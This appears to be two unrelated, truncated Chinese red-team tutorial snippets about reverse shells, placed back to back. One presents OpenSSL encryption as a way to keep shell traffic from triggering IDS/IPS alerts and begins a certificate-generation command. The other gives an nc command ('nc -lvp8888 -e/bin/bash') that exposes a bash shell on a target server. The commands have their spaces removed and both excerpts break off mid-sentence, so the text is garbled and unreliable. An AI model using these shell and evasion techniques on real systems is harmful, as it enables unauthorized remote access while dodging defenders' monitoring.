在实战攻防对抗中，使用常规反弹shell会有一个缺点，那就是所有通过shell传输的流量都是以明文的方式发送的，可以被安全防护设备（如IDS、IPS等）获取到通信传输的数据内容，会导致被触发告警拦截，红队人员会使用一种加密的反弹shell方式，对传输的数据内容进行混淆加密，这里我们使用OpenSSL来进行加密反弹shell，本次实验环境如图1-1所示。 图1-1  OpenSSL反弹shell实验拓扑图 1）首先在使用OpenSSL反弹shell之前，需要对攻击机进行配置，手动执行opensslreq-x509-newkeyrsa:2048-keyoutkey.pem-...

目录 一.利用NC工具在linux执行反弹shell 1.Linux正向连接shell 2.利用Linux自带bash反弹Shell 一.利用NC工具在linux执行反弹shell 图1-1  Linux系统下实验拓扑图 1.Linux正向连接shell  假设在linux操作系统中想要获取反弹shell，其中反弹方式和上述演示的Windows操作系统不同，以两台linux服务器为例进行实验，实验环境如图1-1所示，使用正向连接shell的方式。 1）在目标服务器执行nc-lvp8888-e/bin/bash命令来开启目标服务器的监听，如图1-2所示，当有应...